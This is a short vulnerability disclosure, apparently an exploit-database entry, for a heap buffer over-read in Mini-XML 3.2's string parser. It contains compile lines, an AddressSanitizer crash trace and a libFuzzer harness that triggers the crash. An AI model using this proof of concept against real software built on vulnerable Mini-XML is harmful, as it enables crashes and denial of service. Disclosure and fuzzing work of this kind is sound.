Exploit for Mini-XML 3.2 Heap Overflow

## https://sploitus.com/exploit?id=PACKETSTORM:164702
# Exploit Title: Mini-XML 3.2 - Heap Overflow  
# Google Dork: mxml Mini-xml Mini-XML  
# Date: 2020.10.19  
# Exploit Author: LIWEI  
# Vendor Homepage: https://www.msweet.org/mxml/  
# Software Link: https://github.com/michaelrsweet/mxml  
# Version: v3.2  
# Tested on: ubuntu 18.04.2  
  
# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".  
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.  
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.  
# 4.- Here are the crash backtrace.  
  
=================================================================  
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98  
READ of size 1 at 0x612000000a73 thread T0  
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13  
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20  
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11  
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8  
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)  
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)  
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)  
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)  
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310  
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)  
  
  
# 6.- Here are my testcase.  
  
#include <string>  
#include <vector>  
#include <assert.h>  
#include "mxml.h"  
  
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {  
std::string c(reinterpret_cast<const char *>(data), size);  
char *ptr;  
  
mxml_node_t *tree;  
  
tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);  
  
if(tree){  
  
ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);  
  
if(!ptr) assert(false);  
  
mxmlDelete(tree);  
  
}  
  
return 0;  
  
}